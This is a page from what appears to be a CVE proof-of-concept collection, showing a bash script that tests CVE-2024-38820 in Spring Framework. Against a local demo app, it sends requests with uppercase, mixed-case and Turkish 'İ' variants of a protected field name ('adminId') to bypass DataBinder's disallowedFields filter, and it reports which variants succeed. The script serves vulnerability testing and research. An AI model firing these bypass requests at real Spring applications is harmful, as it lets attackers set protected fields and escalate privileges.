4837 Total CVEs
26 Years
GitHub
Home / 2024 / CVE-2024-38820
README.md
Rendering markdown...
POC / test-cve-2024-38820.sh SH
⬇ Raw GitHub ✕ Close 
#!/bin/bash

# CVE-2024-38820 Test Script
# This script demonstrates the locale-dependent case conversion vulnerability in Spring Framework

echo "=========================================="
echo "CVE-2024-38820 Proof of Concept Test"
echo "=========================================="
echo ""

# Check if the application is running
APP_URL="http://localhost:8081"

echo "🔍 Checking if application is running at $APP_URL..."
if ! curl -s "$APP_URL/test" > /dev/null; then
    echo "❌ Application is not running. Please start it first with: mvn spring-boot:run"
    echo "   Then run this test script again."
    exit 1
fi

echo "✅ Application is running!"
echo ""

# Test 1: Normal case (should be blocked)
echo "📋 Test 1: Normal field name (should be BLOCKED)"
echo "Request: GET /user?username=test&adminId=999"
RESPONSE1=$(curl -s "$APP_URL/user?username=test&adminId=999")
echo "Response: $RESPONSE1"
echo ""

# Test 2: Uppercase field name (may bypass in Turkish locale)
echo "📋 Test 2: Uppercase field name (may BYPASS)"
echo "Request: GET /user?username=test&ADMINID=999"
RESPONSE2=$(curl -s "$APP_URL/user?username=test&ADMINID=999")
echo "Response: $RESPONSE2"
echo ""

# Test 3: Mixed case (may bypass)
echo "📋 Test 3: Mixed case field name (may BYPASS)"
echo "Request: GET /user?username=test&AdminId=999"
RESPONSE3=$(curl -s "$APP_URL/user?username=test&AdminId=999")
echo "Response: $RESPONSE3"
echo ""

# Test 4: Turkish character İ (may bypass)
echo "📋 Test 4: Turkish İ character (may BYPASS)"
echo "Request: GET /user?username=test&ADMİNID=999"
RESPONSE4=$(curl -s "$APP_URL/user?username=test&ADMİNID=999")
echo "Response: $RESPONSE4"
echo ""

# Show locale information
echo "📋 Test 5: Locale information"
echo "Request: GET /test"
TEST5_RESPONSE=$(curl -s "http://localhost:8081/test")
echo "$TEST5_RESPONSE"

echo ""
echo "📋 Test 6: Direct vulnerability demonstration"
echo "Request: GET /vulnerability-demo?testField=ADMINID"
TEST6_RESPONSE=$(curl -s "http://localhost:8081/vulnerability-demo?testField=ADMINID")
echo "$TEST6_RESPONSE"
echo ""

# Summary
echo "=========================================="
echo "🎯 VULNERABILITY ANALYSIS:"
echo "=========================================="

if [[ "$RESPONSE1" == *"adminId bypassed"* ]]; then
    echo "❌ Test 1 FAILED: Normal case should be blocked but was bypassed!"
else
    echo "✅ Test 1 PASSED: Normal case correctly blocked"
fi

if [[ "$RESPONSE2" == *"adminId bypassed"* ]]; then
    echo "🚨 Test 2 VULNERABILITY: Uppercase bypass SUCCESSFUL!"
else
    echo "✅ Test 2 PROTECTED: Uppercase case blocked"
fi

if [[ "$RESPONSE3" == *"adminId bypassed"* ]]; then
    echo "🚨 Test 3 VULNERABILITY: Mixed case bypass SUCCESSFUL!"
else
    echo "✅ Test 3 PROTECTED: Mixed case blocked"
fi

if [[ "$RESPONSE4" == *"adminId bypassed"* ]]; then
    echo "🚨 Test 4 VULNERABILITY: Turkish İ bypass SUCCESSFUL!"
else
    echo "✅ Test 4 PROTECTED: Turkish İ blocked"
fi

echo ""
echo "💡 To see detailed locale conversion information, visit: $APP_URL/test"
echo ""
echo "🔧 To change locale settings:"
echo "   1. Edit src/main/resources/application.properties"
echo "   2. Set different locale values (tr_TR, en_US, etc.)"
echo "   3. Restart the application"
echo ""
echo "📚 CVE-2024-38820 Summary:"
echo "   - Affects Spring Framework's DataBinder disallowedFields protection"
echo "   - String.toLowerCase() behavior varies by locale"
echo "   - In Turkish locale, 'I' becomes 'ı' (dotless i) instead of 'i'"
echo "   - This can bypass field protection mechanisms"
echo "=========================================="